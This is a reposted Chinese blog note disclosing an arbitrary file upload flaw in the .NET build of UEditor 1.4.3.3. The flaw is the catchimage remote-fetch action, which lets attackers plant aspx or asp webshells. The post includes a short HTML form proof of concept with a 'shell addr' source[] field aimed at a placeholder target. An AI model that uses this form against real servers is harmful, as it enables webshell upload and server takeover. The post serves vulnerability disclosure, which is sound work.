码迷,mamicode.com
首页 > 其他好文 > 详细

UEditor1.4.3.3编辑器漏洞

时间:2020-06-07 19:25:17      阅读:262      评论:0      收藏:0      [点我收藏+]

标签:Enctype   包括   detail   绕过   执行文件   code   上传   type   value   

百度的UEditor文本编辑器,漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响.。

.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断,攻击者可以上传任意文件包括脚本执行文件,包括aspx脚本木马,asp脚本木马,还可以利用该UEditor漏洞对服务器进行攻击,执行系统命名破坏服务器

版本为1.4.3.3版本

poc:

<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]"/></p>
<input type="submit" value="submit"/>
</form>

地址:https://www.cnblogs.com/Ivan1ee/p/10198866.html

? https://blog.csdn.net/websinesafe/article/details/82215320

UEditor1.4.3.3编辑器漏洞

标签:Enctype   包括   detail   绕过   执行文件   code   上传   type   value   

原文地址:https://www.cnblogs.com/kbhome/p/13061695.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!